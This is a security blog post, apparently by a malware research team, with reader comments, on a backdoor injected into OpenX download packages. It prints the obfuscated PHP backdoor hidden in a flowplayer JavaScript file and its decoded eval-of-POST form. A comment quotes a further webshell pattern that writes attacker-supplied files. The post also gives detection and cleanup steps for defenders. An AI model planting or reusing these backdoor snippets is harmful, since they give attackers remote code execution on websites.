We received reports that OpenX.org was compromised and the OpenX download files had a backdoor injected in them. According to Heise (in German), the malicious files were modified around November/2012, and have been undetected since.
It means that if you have downloaded OpenX during the last 7 months, it likely contains a backdoor that could allow the attackers full access to your site. That’s how serious it is.
*The OpenX team have confirmed the breach and removed the bad files from their servers.
OpenX Backdoor
We didn’t get access to the infected package yet, but based on some public sources, the backdoor is hidden inside:
/plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js
It can be found by searching for PHP tags inside .js files.
This is what the backdoor looks like:
this.each(function(){l=flashembed(this,k,j)}<?php /*if(e)
{jQuery.tools=jQuery.tools||{version:
{}};jQuery.tools.version.flashembed='1.0.2';
*/$j='ex'./**/'plode'; /* if(this.className ...
If you look close you can see the PHP code mingled with the JavaScript code, which is meant to make it harder to detect.
After decoding it looks like this:
<?php
$j='explode';
$_=$j(",",'strrev,str_rot13,vastPlayer');
eval ( $_[1]($_[0]( $_POST[$_[2]])) );
This allows the attackers to execute any PHP code via the “eval” function.
Here is a simple command to find if your OpenX install has the backdoor:
$ grep -r --include "*.js" '<?php' DIRECTORYWHEREYOURSITEIS
Our team is still investigating the issue, and we will provide more details soon.
Fioravante Souza
Allison Bondi
Samuel Odendaal
Luke Leal
Sucuri Malware Research Team
Denis Sinegubko
Gerson Ruiz
Eli Trevino
9 comments
Attacker then puts lots of files with code like this:
?php if (sha1($_REQUEST[z]) == ‘[REDACTED]’){@file_put_contents(stripslashes($_REQUEST[e]),stripslashes($_REQUEST[t]));die(md5(‘md5’));}
on the server (often replacing “file_put_contents” with “system” or “call_user_func” etc.), plus a couple of more complex backdoors containing obfuscated PHP code.
Best way to check installation is to run a diff versus a clean download of the same version.
Files found not present in default installation containing obfuscated code:
plugins/api/api.php
var/cache/minify_8faf80e_mergedDeliveryFunctions.php
www/admin/plugins/oxMarket/market-settings.php
www/images/layerstyles/geocities/geocities.php
Is there a way of fixing this ?
OpenX.org has a fixed version, 2.8.11, out.
OpenX has version 2.8.11 out which fixes the problem. See their website.
Also, when compromised, look in the “banners” table of your OpenX database for cases where
prepend != ”
or more precisely
prepend LIKE ‘%iframe%’
This will typically show Javascript code trying to exploit client vulnerabilities. Attacker seems to overwrite all contents of all “prepend” fields with the same JS code.
Is that a form of the virus. How would its effects
Read my postings below.
Main focus seemed to be to deliver malware with the ads delivered, though attacker might use his own backdoors for further malicious activities later if system isn’t patched.
No, no solution until now. Today 24/09/2013, the version is Openx 2.8.11. And this problem still there.
Is a shame, the “paid” version has this problem?
Comments are closed.